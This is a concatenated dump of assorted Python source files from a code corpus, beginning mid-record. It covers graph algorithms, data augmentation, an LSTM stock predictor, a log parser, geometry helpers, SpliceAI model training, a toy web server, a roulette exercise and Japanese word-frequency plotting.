train_valid_split)\n\n train_split = get_split(index_file_root=train_split_root, dataset=train_valid_split)\n valid_split = get_split(index_file_root=valid_split_root, dataset=train_valid_split)\n return train_split, valid_split, test_split\n\n\ndef get_transformation(normalize_scale, is_graph=False):\n if normalize_scale:\n if is_graph:\n return Compose([NormalizeScale(), KNNGraph(k=9, loop=True, force_undirected=True)])\n else:\n return NormalizeScale()\n else:\n return None\n\n\ndef get_pre_transformation(number_points=1024):\n return SamplePoints(num=number_points)\n\n\ndef get_random_flip(axis=1, p=0.5):\n return RandomFlip(axis, p)\n\n\ndef get_random_rotation(degrees=45, axis=1):\n return RandomRotate(degrees, axis)\n\n\ndef data_augmentation_flip(normalize_scale, is_graph, axis=1, p=0.5):\n return Compose([get_transformation(normalize_scale, is_graph), get_random_flip(axis, p)])\n\n\ndef data_augmentation_rotation(normalize_scale, is_graph, axis=1, degrees=45):\n return Compose([get_transformation(normalize_scale, is_graph), get_random_rotation(axis=axis, degrees=degrees)])\n\n\ndef data_augmentation_flip_rotation(normalize_scale, is_graph, axis_flip=1, p=0.5, axis_rotation=1, degrees=45):\n return Compose([get_transformation(normalize_scale, is_graph), get_random_flip(axis_flip, p),\n get_random_rotation(axis=axis_rotation, degrees=degrees)])\n\n\ndef get_data_augmentation(dataset, transformation, is_graph, normalize_scale, axis_flip=1, p=0.5, axis_rotation=1, degrees=45):\n if transformation is not None:\n if transformation.lower() == 'flip_rotation':\n dataset.transform = data_augmentation_flip_rotation(normalize_scale, is_graph, axis_flip, p, axis_rotation, degrees)\n elif transformation.lower() == 'flip':\n dataset.transform = data_augmentation_flip(normalize_scale, is_graph, axis=axis_flip, p=p)\n elif transformation.lower() == 'rotate':\n dataset.transform = data_augmentation_rotation(normalize_scale, is_graph, axis=axis_rotation, degrees=degrees)\n else:\n raise ValueError(\"data augmentation bad introduced\")\n","sub_path":"src/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"643590932","text":"class MyGraph:\n\n def __init__(self, g={}):\n self.g = g\n\n def size(self):\n return len(self.get_nodes()), len(self.get_edges())\n\n def print_graph(self):\n [print (node, \" --> \" ,self.g[node]) for node in self.g.keys()]\n\n def get_nodes(self):\n return list(self.g.keys())\n\n def get_edges(self):\n return [(o, d) for o, nodes_dest in self.g.items() for d in nodes_dest]\n\n def add_node(self, node):\n if node not in self.g.keys():\n self.g[node]=[]\n\n def add_edge(self, orig, dest):\n if orig not in self.g.keys():\n self.add_node(orig)\n if dest not in self.g.keys():\n self.add_node(dest)\n if dest not in self.g[orig]:\n self.g[orig].append(dest)\n\n def get_successors(self, node):\n return list(self.g[node])\n\n def get_predecessors(self, node):\n return [node_orig for node_orig, nodes_dest in self.g.items() if node in nodes_dest]\n\n def get_adjacents(self, node):\n s = self.get_successors(node)\n p = self.get_predecessors(node)\n return list(set(s+p))\n\n def out_degree(self, node):\n return len(self.g[node])\n\n def in_degree(self, node):\n return len(self.get_predecessors(node))\n\n def degree(self, node):\n return len(self.get_adjacents(node))\n\n def reachableBFS (self, node):\n to_visit = [node]\n res=[]\n while to_visit:\n actual_node = to_visit.pop(0) #index required to remove the first element of the list\n if node!= actual_node : res.append(actual_node)\n to_visit.extend([elem for elem in self.g[actual_node] if elem not in res and elem not in to_visit])\n return res\n\n def reachableDFS (self, node):\n to_visit = [node]\n res = []\n while to_visit:\n actual_node = to_visit.pop(0)\n if node!= actual_node : res.append(actual_node)\n aux = [elem for elem in self.g[actual_node] if elem not in res and elem not in to_visit]\n to_visit = aux + to_visit\n return res\n\n\n def distance(self, orig, dest):\n if orig == dest: return 0\n l = [(orig, 0)]\n visited = [orig]\n while l:\n actual_node, dist = l.pop(0)\n for elem in self.g[actual_node]:\n if elem == dest:\n return dist + 1\n elif elem not in visited:\n l.append((elem, dist + 1))\n visited.append(elem)\n return float(\"inf\")\n\n\n def shortest_path(self, orig, dest):\n if orig == dest: return []\n l = [(orig, [])]\n visited = []\n while l:\n actual_node, path = l.pop(0)\n for elem in self.g[actual_node]:\n if elem == dest:\n return [orig] + path + [elem]\n elif elem not in visited:\n l.append((elem, path + [elem]))\n visited.append(elem)\n return None\n\n\n def reachable_with_dist(self, node):\n res = []\n l = [(node, 0)]\n while len(l) > 0:\n actual_node, dist = l.pop(0)\n if actual_node != node: res.append((actual_node, dist))\n for elem in self.g[actual_node]:\n if elem not in [x[0] for x in l + res]:\n l.append((elem, dist + 1))\n return res\n\n def node_has_cycle (self, node):\n l = [node]\n res = False\n visited = [node]\n while l:\n actual_node = l.pop()\n for elem in self.g[actual_node]:\n if elem == node: return True\n elif elem not in visited:\n l.append(elem)\n visited.append(elem)\n return res\n\n def has_cycle(self):\n for v in self.g.keys():\n if self.node_has_cycle(v): return True\n return False\n\n #aula 3\n #########################################\n def all_degrees(self, deg_type = \"inout\"):\n degs = {v: len(self.g[v]) if (deg_type == \"out\" or deg_type == \"inout\") else 0 for v in self.g.keys()}\n\n if deg_type == \"in\" or deg_type == \"inout\":\n for v in self.g.keys():\n for d in self.g[v]:\n if deg_type == \"in\" or v not in self.g[d]:\n degs[d] += 1\n return degs\n\n def mean_degree (self, deg_type = \"inout\"):\n degrees = self.all_degrees(deg_type)\n return sum(degrees.values()) / float(len(degrees))\n\n def prob_degree (self, deg_type = \"inout\"):\n degrees = self.all_degrees(deg_type)\n res={}\n for node in degrees:\n k = degrees[node]\n res[k] = 1 if k not in res.keys() else res[k]+1\n return {k: val/len(degrees) for k,val in res.items()}\n\n\n def mean_distances(self):\n tot = 0\n num_reachable = 0\n for k in self.g.keys():\n distsk = self.reachable_with_dist(k)\n for _, dist in distsk:\n tot += dist\n num_reachable += len(distsk)\n meandist = float(tot) / num_reachable\n n = len(self.get_nodes())\n return meandist, float(num_reachable) / ((n - 1) * n)\n\n def clustering_coef(self, v):\n adjs = self.get_adjacents(v)\n if len(adjs) == 0: return 0\n if len(adjs) == 1: return 1.0\n ligs = 0\n for i in range(0, len(adjs)):\n for j in range(i+1, len(adjs)):\n n1 = adjs[i]\n n2 = adjs[j]\n if n1 in self.g[n2] or n2 in self.g[n1]:\n ligs += 1\n return float(ligs) / ((len(adjs) * (len(adjs) - 1))/2)\n\n def all_clustering_coefs(self):\n return {k:self.clustering_coef(k) for k in self.g.keys()}\n\n\n def meanClusteringCoef(self):\n ccs = self.all_clustering_coefs()\n return sum(ccs.values()) / float(len(ccs))\n\n def mean_clustering_per_deg(self, deg_type=\"inout\"):\n degs = self.all_degrees(deg_type)\n ccs = self.all_clustering_coefs()\n print(degs)\n print(ccs)\n degs_node = {}\n for n in degs.keys():\n if degs[n] in degs_node.keys():\n degs_node[degs[n]].append(n)\n else:\n degs_node[degs[n]] = [n]\n print(degs_node)\n ck = {}\n for d in degs_node.keys():\n tot = sum([ccs[node] for node in degs_node[d]])\n ck[d] = float(tot) / len(degs_node[d])\n return ck\n\n # AULA 4\n #\n def check_balanced_node(self, node):\n pass\n\t\t\n def check_balanced_graph(self):\n pass\n\n #ciclo euleriano\n\n def eulerian_cycle(self):\n pass\n\n def check_nearly_balanced_graph(self):\n pass\n\t\t\n def eulerian_path(self):\n pass\n\n # caminhos Hamiltonianos\n def check_is_valid_path(self, path):\n pass\n\n def check_is_hamiltonian_path(self, path):\n pass\n\n def search_hamiltonian_path_from_node(self, node):\n pass\n\t\t\n def search_hamiltonian_path(self):\n pass\n\n","sub_path":"TP1/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":7036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"545756389","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\nfrom sklearn.preprocessing import MinMaxScaler\n\nfrom sklearn.model_selection import train_test_split\n\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom tensorflow.keras.layers import LSTM\n\ndef jonkmokPredict(jonkmokname):\n df_price = pd.read_csv('../pyth onProject4/주가 데이터 5년_학습용/ARIRANG 200선물레버리지_수정주가.csv', encoding='euc-kr', index_col = 0)\n df_price['날짜'] = pd.to_datetime(df_price['날짜'], format='%Y%m%d')\n df_price['연도'] =df_price['날짜'].dt.year\n df_price['월'] =df_price['날짜'].dt.month\n df_price['일'] =df_price['날짜'].dt.day\n # print(df_price.describe())\n # print(df_price.head())\n\n df = df_price.loc[df_price['연도']>=1990]\n\n # plt.figure(figsize=(16, 9))\n # sns.lineplot(y=df['종가'], x=df['날짜'])\n # plt.xlabel('time')\n # plt.ylabel('price')\n # plt.show()\n\n scaler = MinMaxScaler()\n scale_cols = ['시가', '고가', '저가', '종가', '거래량']\n df_scaled = scaler.fit_transform(df[scale_cols])\n\n df_scaled = pd.DataFrame(df_scaled)\n df_scaled.columns = scale_cols\n\n # print(df_scaled)\n\n TEST_SIZE = 200\n\n train = df_scaled[:-TEST_SIZE]\n test = df_scaled[-TEST_SIZE:]\n\n def make_dataset(data, label, window_size=30):\n feature_list = []\n label_list = []\n for i in range(len(data) - window_size):\n feature_list.append(np.array(data.iloc[i:i+window_size]))\n label_list.append(np.array(label.iloc[i+window_size]))\n return np.array(feature_list), np.array(label_list)\n\n feature_cols = ['시가', '고가', '저가', '거래량']\n label_cols = ['종가']\n\n train_feature = train[feature_cols]\n train_label = train[label_cols]\n\n test_feature = test[feature_cols]\n test_label = test[label_cols]\n\n # train dataset\n train_feature, train_label = make_dataset(train_feature, train_label, 20)\n\n # train, validation set 생성\n\n x_train, x_valid, y_train, y_valid = train_test_split(train_feature, train_label, test_size=0.2)\n\n x_train.shape, x_valid.shape\n # ((6086, 20, 4), (1522, 20, 4))\n\n # test dataset (실제 예측 해볼 데이터)\n test_feature, test_label = make_dataset(test_feature, test_label, 20)\n test_feature.shape, test_label.shape\n # ((180, 20, 4), (180, 1))\n\n model = Sequential()\n model.add(LSTM(16,\n input_shape=(train_feature.shape[1], train_feature.shape[2]),\n activation='relu',\n return_sequences=False)\n )\n model.add(Dense(1))\n\n model.compile(loss='mean_squared_error', optimizer='adam')\n early_stop = EarlyStopping(monitor='val_loss', patience=5)\n filename = '{}_checkpoint.h5'.format(jonkmokname)\n checkpoint = ModelCheckpoint(filename, monitor='val_loss', verbose=1, save_best_only=True, mode='auto')\n\n history = model.fit(x_train, y_train,\n epochs=200,\n batch_size=16,\n validation_data=(x_valid, y_valid),\n callbacks=[early_stop, checkpoint])\n\n model.load_weights(filename)\n\n # 예측\n pred = model.predict(test_feature)\n\n # plt.figure(figsize=(12, 9))\n # plt.plot(test_label, label='actual')\n # plt.plot(pred, label='prediction')\n # plt.legend()\n # plt.show()\n\n return filename, pred[-1]\n","sub_path":"pythonProject6/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"567105008","text":"#!/usr/bin/python3\n\"\"\"this script parses log files\"\"\"\nfrom signal import signal, SIGINT\nimport sys\nimport re\nimport select\n\n\ni = 0\nsize = 0\nstatCode = {\n 200: 0, 301: 0,\n 400: 0, 401: 0,\n 403: 0, 404: 0,\n 405: 0, 500: 0\n }\n\n\ndef signol(sig, frame):\n \"\"\"signol: handeler\"\"\"\n output(size, statCode)\n\n\ndef output(s, sC):\n \"\"\"prints the proper output\"\"\"\n print(\"File size: {}\".format(size))\n for stat, freq in sorted(statCode.items()):\n if freq:\n print(\"{}: {}\".format(stat, freq))\n\n\nsignal(SIGINT, signol)\nif select.select([sys.stdin, ], [], [], 0.0)[0]:\n for data in sys.stdin:\n if i and i % 10 == 0:\n output(size, statCode)\n try:\n code = re.split(' ', data)[-2:-1]\n size += int(re.split(' ', data)[-1])\n if int(code[0]) in statCode:\n statCode[int(code[0])] += 1\n i += 1\n except Exception:\n pass\n\noutput(size, statCode)\n","sub_path":"0x06-log_parsing/0-stats.py","file_name":"0-stats.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"344322505","text":"pi = 3.14\nfull_pi = 3.14285714286\n\n\n\ndef centimeterToMeter(valueOfCmToBeChangedToM):\n print (valueOfCmToBeChangedToM / 100)\n\n\ndef meterToCentimeter(valueOfMeterToBeChangedToCm):\n print (valueOfMeterToBeChangedToCm * 100)\n\n\ndef centimeterToKilometer(valueOfCentimeterToBeChangedToKm):\n print (valueOfCentimeterToBeChangedToKm / 100000)\n\n\ndef kilometerToCentimeter(valueOfKilometerToBeChangedToCm):\n print (valueOfKilometerToBeChangedToCm * 100000)\n\n\ndef meterToKilometer(valueOfMeterToBeChangedToKm):\n print (valueOfMeterToBeChangedTokilometer / 1000)\n\n\ndef kilometerToMeter(valueOfKilometerToBeChangedToM):\n print (valueOfKilometerToBeChangedToMeter * 1000)\n\n\ndef millimeterToKilometer(valueOfMillimeterToBeChangedToKm):\n print (valueOfMillimeterToBeChangedToKm / 1000000)\n\n\ndef kilometerToMillimeter(valueOfKilometerToBeChangedToMm):\n print (valueOfMillimeterToBeChangedToKm * 1000000)\n\n#Circle\ndef circle(radius, operationToDoInCircle, typeOfCircle):\n if operationToDoInCircle == \"area\":\n #area\n #Type of Circle\n if typeOfCircle == \"Full\":\n return pi * radius * radius\n elif typeOfCircle == \"Semicircle\":\n return pi * 0.5 * radius * radius\n elif typeOfCircle == \"Quarter circle\":\n return pi * 0.25 * radius * radius\n else:\n print (\"Not a supported circle type.\")\n elif operationToDoInCircle == \"perimeter\":\n #perimeter\n if typeOfCircle == \"Full\":\n return pi * radius * 2\n elif typeOfCircle == \"Semicircle\":\n return (0.5 * pi * radius * 2) + radius * 2\n elif typeOfCircle == \"Quarter circle\":\n return (pi * 0.25 * radius * 2) + radius * 2\n else:\n print (\"Not a supported circle type\")\n\n\n else:\n print (\"Not an operation\")\n\n\ndef squareOrRectangle(shape, operationToDo, lengthOfShape, breadthOfShape):\n if shape == \"square\":\n #square\n if lengthOfShape == breadthOfShape:\n\n if operationToDo == \"area\":\n #areaOfSquare\n return lengthOfShape ** 2\n elif operationToDo == \"perimeter\":\n #perimeterOfSquare\n return lengthOfShape * 4\n else:\n print (\"Not an operation\")\n else:\n print (\"Not a square\")\n elif shape == \"rectangle\":\n #rectangle\n if operationToDo == \"area\":\n #areaOfRectangle\n return lengthOfShape * breadthOfShape\n elif operationToDo == \"perimeter\":\n #perimeterOfRectangle\n return (lengthOfShape + breadthOfShape) * 2\n else:\n print (\"Not an operation\")\n else:\n print (\"Not a valid shape for function\")\n\n#Triangle\ndef areaOfTriangle(base, height):\n return base * height * 0.5\ndef perimeterOfTriangle(side,nextSide,lastSide,type):\n if type == \"Equilateral\":\n return side * 3\n elif type == \"Isosceles\":\n return side + nextSide * 2\n elif type == \"Scalene\":\n return side + nextSide + lastSide\n else:\n print (\"Error, not a triangle type, the only types are: \\n Equilateral \\n Isosceles \\n and Scalene\")\n\n#Volumes\ndef volumeOfCubeOrCuboid(lengthOfCuboid, breadthOfCuboid, heightOfCuboid, shape):\n if shape == \"Cube\":\n if lengthOfCuboid == breadthOfCuboid and lengthOfCuboid == heightOfCuboid and breadthOfCuboid == heightOfCuboid:\n return lengthOfCuboid ** 3\n else:\n print (\"Not a cube\")\n elif shape == \"Cuboid\":\n return lengthOfCuboid * heightOfCuboid * breadthOfCuboid\n else:\n print (\"Not a cube or cuboid\")\n\ndef findVolumeOfCylinder(base, height):\n print (int(3.14 * base * base * height))\n\n\ndef findVolumeOfPyramid(baseLengthOfPyramid, baseWidthOfPyramid, heightOfPyramid):\n print (int((baseLengthOfPyramid * baseWidthOfPyramid * heightOfPyramid) / 3))\n","sub_path":"cblmath.py","file_name":"cblmath.py","file_ext":"py","file_size_in_byte":3907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"197016995","text":"###############################################################################\n# This file contains the code to train the SpliceAI model.\n###############################################################################\n\nimport numpy as np\nimport sys\nimport time\nimport h5py\nimport keras.backend as kb\nimport tensorflow as tf\nfrom spliceai import *\nfrom utils import *\nfrom constants import *\nfrom custom_utils import Callback, Chromosome\n\n\nassert int(sys.argv[1]) in [80, 400, 2000, 10000]\n###############################################################################\n# Model\n###############################################################################\n\nL = 32\nN_GPUS = 1\n\nif int(sys.argv[1]) == 80:\n W = [11, 11, 11, 11]\n AR = [1, 1, 1, 1]\n BATCH_SIZE = 18*N_GPUS\nelif int(sys.argv[1]) == 400:\n W = [11, 11, 11, 11, 11, 11, 11, 11]\n AR = [1, 1, 1, 1, 4, 4, 4, 4]\n BATCH_SIZE = 18*N_GPUS\nelif int(sys.argv[1]) == 2000:\n W = [11, 11, 11, 11, 11, 11, 11, 11,\n 21, 21, 21, 21]\n AR = [1, 1, 1, 1, 4, 4, 4, 4,\n 10, 10, 10, 10]\n BATCH_SIZE = 12*N_GPUS\nelif int(sys.argv[1]) == 10000:\n W = [11, 11, 11, 11, 11, 11, 11, 11,\n 21, 21, 21, 21, 41, 41, 41, 41]\n AR = [1, 1, 1, 1, 4, 4, 4, 4,\n 10, 10, 10, 10, 25, 25, 25, 25]\n BATCH_SIZE = 6*N_GPUS\n# Hyper-parameters:\n# L: Number of convolution kernels\n# W: Convolution window size in each residual unit\n# AR: Atrous rate in each residual unit\n\nCL = 2 * int(np.sum(np.asarray(AR)*(np.asarray(W)-1)))\nassert CL <= CL_max and CL == int(sys.argv[1])\nprint (\"\\033[1mContext nucleotides: %d\\033[0m\" % (CL))\nprint (\"\\033[1mSequence length (output): %d\\033[0m\" % (SL))\ncallback = Callback()\n\n\n###############################################################################\n# Training and validation\n###############################################################################\ntry:\n h5f = h5py.File(data_dir + 'train_all_0.h5', 'r')\nexcept OSError:\n h5f = h5py.File(data_dir + 'train_all_1.h5', 'r')\n\nnum_idx = len(h5f.keys())//2\nh5f.close()\nidx_all = np.random.permutation(num_idx)\nidx_train = idx_all[:int(0.9*num_idx)]\nidx_valid = idx_all[int(0.9*num_idx):]\n\nEPOCH_NUM = 10\n\nstart_time = time.time()\nfid = 0\n\nfor model_idx in range(1, 6):\n model_m = SpliceAI(L, W, AR)\n model_m.compile(loss=categorical_crossentropy_2d, optimizer='adam')\n for epoch_num in range(EPOCH_NUM):\n print(\"model {} epoch {}\".format(model_idx, epoch_num))\n try:\n h5f = h5py.File(data_dir + 'train_all_{}.h5'.format(fid), 'r')\n fid = 1 - fid\n except OSError:\n h5f = h5py.File(data_dir + 'train_all_{}.h5'.format(1-fid), 'r')\n print(\"using {} h5 file for training\".format(1 - fid))\n callback()\n for j in range(len(idx_train)):\n print('epoch progress: {:.2f}'.format(j/len(idx_train)))\n idx = np.random.choice(idx_train)\n X = h5f['X' + str(idx)][:]\n Y = h5f['Y' + str(idx)][:]\n \n Xc, Yc = clip_datapoints(X, Y, CL, N_GPUS) \n model_m.fit(Xc, Yc, batch_size=BATCH_SIZE, verbose=0)\n \n \n \n # Printing metrics (see utils.py for details)\n \n print (\"--------------------------------------------------------------\")\n print (\"\\n\\033[1mValidation set metrics:\\033[0m\")\n \n Y_true_1 = [[] for t in range(1)]\n Y_true_2 = [[] for t in range(1)]\n Y_pred_1 = [[] for t in range(1)]\n Y_pred_2 = [[] for t in range(1)]\n \n for idx in idx_valid:\n \n X = h5f['X' + str(idx)][:]\n Y = h5f['Y' + str(idx)][:]\n \n Xc, Yc = clip_datapoints(X, Y, CL, N_GPUS)\n Yp = model_m.predict(Xc, batch_size=BATCH_SIZE)\n \n if not isinstance(Yp, list):\n Yp = [Yp]\n \n for t in range(1):\n \n is_expr = (Yc[t].sum(axis=(1,2)) >= 1)\n \n Y_true_1[t].extend(Yc[t][is_expr, :, 1].flatten())\n Y_true_2[t].extend(Yc[t][is_expr, :, 2].flatten())\n Y_pred_1[t].extend(Yp[t][is_expr, :, 1].flatten())\n Y_pred_2[t].extend(Yp[t][is_expr, :, 2].flatten())\n \n print (\"\\n\\033[1mAcceptor:\\033[0m\")\n for t in range(1):\n print_topl_statistics(np.asarray(Y_true_1[t]),\n np.asarray(Y_pred_1[t]))\n \n print (\"\\n\\033[1mDonor:\\033[0m\")\n for t in range(1):\n print_topl_statistics(np.asarray(Y_true_2[t]),\n np.asarray(Y_pred_2[t]))\n \n print (\"\\n\\033[1mTraining set metrics:\\033[0m\")\n \n Y_true_1 = [[] for t in range(1)]\n Y_true_2 = [[] for t in range(1)]\n Y_pred_1 = [[] for t in range(1)]\n Y_pred_2 = [[] for t in range(1)]\n \n for idx in idx_train[:len(idx_valid)]:\n \n X = h5f['X' + str(idx)][:]\n Y = h5f['Y' + str(idx)][:]\n \n Xc, Yc = clip_datapoints(X, Y, CL, N_GPUS)\n Yp = model_m.predict(Xc, batch_size=BATCH_SIZE)\n \n if not isinstance(Yp, list):\n Yp = [Yp]\n \n for t in range(1):\n \n is_expr = (Yc[t].sum(axis=(1,2)) >= 1)\n \n Y_true_1[t].extend(Yc[t][is_expr, :, 1].flatten())\n Y_true_2[t].extend(Yc[t][is_expr, :, 2].flatten())\n Y_pred_1[t].extend(Yp[t][is_expr, :, 1].flatten())\n Y_pred_2[t].extend(Yp[t][is_expr, :, 2].flatten())\n \n print (\"\\n\\033[1mAcceptor:\\033[0m\")\n for t in range(1):\n print_topl_statistics(np.asarray(Y_true_1[t]),\n np.asarray(Y_pred_1[t]))\n \n print (\"\\n\\033[1mDonor:\\033[0m\")\n for t in range(1):\n print_topl_statistics(np.asarray(Y_true_2[t]),\n np.asarray(Y_pred_2[t]))\n \n print (\"Learning rate: %.5f\" % (kb.get_value(model_m.optimizer.lr)))\n print (\"--- %s seconds ---\" % (time.time() - start_time))\n start_time = time.time()\n \n print (\"--------------------------------------------------------------\")\n \n model_m.save('./Models/SpliceAI' + sys.argv[1]\n + '_c{}'.format(model_idx) + '.h5')\n \n if epoch_num > 4:\n kb.set_value(model_m.optimizer.lr,\n 0.5*kb.get_value(model_m.optimizer.lr))\n # Learning rate decay\n h5f.close()\n \n###############################################################################\n\n","sub_path":"Canonical/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"521315497","text":"import socket\nimport urllib.parse\n\n\nclass Request(object):\n def __init__(self):\n self.method = 'GET'\n self.path = ''\n self.query = {}\n self.body = ''\n\n def form(self):\n body = urllib.parse.unquote(self.body)\n args = body.split('&')\n f = {}\n for arg in args:\n k, v = arg.split('=')\n f[k] = v\n return f\n\n\nclass Message(object):\n def __init__(self, form):\n self.author = form.get('author', '')\n self.message = form.get('message', '')\n\n def __repr__(self):\n return '{}:{}'.format(self.author, self.message)\n\n\nmessage_list = []\nrequest = Request()\n\n\ndef template(name):\n with open(name, 'r', encoding='utf-8') as f:\n return f.read()\n\n\ndef route_index():\n header = 'HTTP/1.1 210 VERY OK\\r\\nContent-Type: text/html\\r\\n'\n\n body = template('index.html')\n r = header + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\ndef route_message():\n if request.method == 'POST':\n form = request.form()\n msg = Message(form)\n print('message', form, msg)\n message_list.append(msg)\n\n header = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html\\r\\n'\n body = template('index.html')\n msgs = '
'.join([str(m) for m in message_list])\n body = body.replace('{{messages}}', msgs)\n r = header + '\\r\\n' + body\n return r.encode(encoding='utf-8')\n\n\ndef route_image():\n filename = request.query.get('file')\n with open(filename, 'rb') as f:\n header = b'HTTP/1.1 200 OK\\r\\nContent-Type: image/gif\\r\\n\\r\\n'\n img = header + f.read()\n return img\n\n\ndef error(code=404):\n e = {\n 404: b'HTTP/1.1 404 NOT FOUND\\r\\n

NOT FOUND

',\n }\n return e.get(code, b'')\n\n\ndef parsed_path(path):\n# /msg/add?message=hello&author=gua\n index = path.find('?')\n if index == -1:\n return path,{}\n else:\n path, query_string = path.split('?', 1)\n args = query_string.split('&')\n query = {}\n for arg in args:\n k, v = arg.split('=')\n query[k] = v\n return path, query\n\n\ndef response_for_path(path):\n path, query = parsed_path(path)\n request.path = path\n request.query = query\n r = {\n '/': route_image(),\n '/static/image': route_image(),\n '/messages': route_message()\n }\n response = r.get(path, error)\n return response()\n\n\ndef run(host='', port=3000):\n with socket.socket() as s:\n s.bind((host, port))\n while True:\n s.listen(3)\n connection, address = s.accept()\n r = connection.recv(1000)\n r = r.decode('utf-8')\n try:\n path = r.split()[1]\n request.method = r.split()[0]\n\n request.body = r.split('\\r\\n\\r\\n', 1)[1]\n response = response_for_path(path)\n connection.sendall(response)\n except Exception as e:\n print('error', e)\n\n connection.close()\n\n\nif __name__ == '__main__':\n congig = dict(\n host='',\n port=3000,\n )\n run(**congig)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"229666446","text":"#!/bin/python3\n\nimport random\n\n# sprawdzamy czy podany numer jest liczba calkowita\ndef CzyInt(numer):\n if type(numer) == type(int()): return True\n else: return False\n\n# sprawdzamy czy podany numer jest w dziedzinie funkcji\ndef CzyDziedzina(numer):\n if numer in range(0,36+1): return True\n else: return False\n\ndef CzyParzyste(numer):\n if numer % 2 == 0: return True\n else: return False\n\ndef RuletkaIfy(numer):\n if not CzyInt(numer): return\n if not CzyDziedzina(numer): return\n\n kolor = None\n parzystosc = numer % 2\n\n if numer == 0:\n kolor = 'zielony'\n elif numer in range(1,10+1):\n if CzyParzyste(numer):\n kolor = 'czarny'\n else: \n kolor = 'czerwony'\n elif numer in range(11,18+1):\n if CzyParzyste(numer):\n kolor = 'czerwony'\n else:\n kolor = 'czarny'\n elif numer in range(19,28+1):\n if CzyParzyste(numer):\n kolor = 'czarny'\n else:\n kolor = 'czerwony'\n elif numer in range(29,36+1):\n if CzyParzyste(numer):\n kolor = 'czerwony'\n else:\n kolor = 'czarny'\n\n\n print(\"Numer:\",numer)\n print(\"Kolor:\",kolor)\n\n# ruletka na słownikach\ndef Ruletka(numer):\n if not CzyInt(numer): return\n if not CzyDziedzina(numer): return\n\n przedzialy = {\\\n 'A' : range(0,0+1),\\\n 'B' : range(1,10+1),\\\n 'C' : range(11,18+1),\\\n 'D' : range(19,28+1),\\\n 'E' : range(29,36+1)}\n\n kolory = {\\\n 'A' : ['zielony'],\\\n 'B' : ['czarny','czerwony'],\\\n 'C' : ['czerwony','czarny'],\\\n 'D' : ['czarny','czerwony'],\\\n 'E' : ['czerwony','czarny']}\n\n wylosowanyPrzedzial = None\n\n for przedzial in przedzialy:\n zakres = przedzialy[przedzial]\n if numer in zakres:\n wylosowanyPrzedzial = przedzial\n break\n \n parzystosc = numer % 2\n kolor = kolory[wylosowanyPrzedzial][parzystosc]\n\n print(\"Numer:\",numer)\n print(\"Kolor:\",kolor)\n\n\n\ndef main():\n # pseudo-losowa liczba całkowita z zakresu [0,36]\n numer = random.randint(0,36)\n RuletkaIfy(numer)\n Ruletka(numer)\n\nif __name__==\"__main__\":\n main()\n","sub_path":"grupa-wt-1315-1500/Lekcja09/prog2.py","file_name":"prog2.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281865687","text":"#!/usr/bin/env python\n# *-# -*- coding: utf-8 -*-\n\n'''\n第4章: 形態素解析\n夏目漱石の小説『吾輩は猫である』の文章(neko.txt)をMeCabを使って形態素解析し,\nその結果をneko.txt.mecabというファイルに保存せよ.このファイルを用いて,\n以下の問に対応するプログラムを実装せよ.\nなお,問題37, 38, 39はmatplotlibもしくはGnuplotを用いるとよい.\n30. 形態素解析結果の読み込み\n形態素解析結果(neko.txt.mecab)を読み込むプログラムを実装せよ.\nただし,各形態素は表層形(surface),基本形(base),品詞(pos),品詞細分類1(pos1)を\nキーとするマッピング型に格納し,1文を形態素(マッピング型)のリストとして表現せよ.\n第4章の残りの問題では,ここで作ったプログラムを活用せよ.\n\n37. 頻度上位10語\n出現頻度が高い10語とその出現頻度をグラフ(例えば棒グラフなど)で表示せよ.\n\n'''\n\n#とりあえず文を読み込むのを使う\nimport module30y_k as myk\nprint(\"----------\")\n\n#単語に修正 変数はmeisiのままだけど・・・\n\nmeisi = []\nfor item in myk.listx:\n meisi.append(item[\"surface\"])\n\n#エクセルのcountifみたいな感じにする\n\n#重複を削除したリストを作成\nsmeisi = list(set(meisi))\n\n#重複を削除したリスト一つ一つでカウントする\nclist = []\nfor item2 in smeisi:\n clist.append([item2, meisi.count(item2)])\n\n#ならべかえ 2個目の「数字」で、逆順に並べ替え\nclist.sort(key=lambda x:(x[1]), reverse=True)\n\nfor ten in clist[:10]: #clist[0:10]の省略\n print(ten)\n\n#さて、グラフを描きます\n# http://yubais.net/doc/matplotlib/bar.html\n#棒グラフの描写は plt.bar() で行います。 引数には2つのリストが必要です。\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\n\n#フォントを設定。Windowsようなので、あしからず\nfp = FontProperties(fname='C:\\Windows\\Fonts\\meiryo.ttc')\n\n'''\nzipを使って書き換え\nX = list(range(1, 11)) #1から10まで\nXlab = []\nY = []\n\nfor item3 in clist[0:10]:\n Xlab.append(item3[0])\n Y.append(item3[1])\n'''\nXlab, Y = zip(*clist[0:10])\n\nplt.bar(X,Y, align=\"center\") # 中央寄せ\nplt.xticks(X, Xlab, 